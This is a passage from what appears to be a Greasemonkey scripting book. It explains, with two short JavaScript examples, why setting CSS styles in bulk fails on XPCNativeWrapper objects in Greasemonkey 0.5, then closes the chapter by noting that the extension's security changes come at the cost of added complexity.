var elmFoo = document.getElementById("foo"); elmFoo.setAttribute("style", "margin:0; padding:0;");
This does not work in Greasemonkey scripts, because the object returned by document.getElementById is an XPCNativeWrapper, and XPCNativeWrappers do not support this shorthand for setting CSS styles in bulk. You will need to set each style individually:
var elmFoo = document.getElementById("foo"); elmFoo.style.margin = 0; elmFoo.style.padding = 0;
Conclusion
This is a long and complicated hack, and if you're not thoroughly confused by now, you probably haven't been paying attention. The security concerns that prompted the architectural changes in Greasemonkey 0.5 are both subtle and complex, but it's important that you understand them.
The trade-off for this increased security is increased complexity, specifically the limitations and quirks of XPCNativeWrappers. There is not much I can do to make this easier to digest, except to assure you that all the scripts in this book work. I have personally updated all of them and tested them extensively in Greasemonkey 0.5. They can serve as blueprints for your own hacks.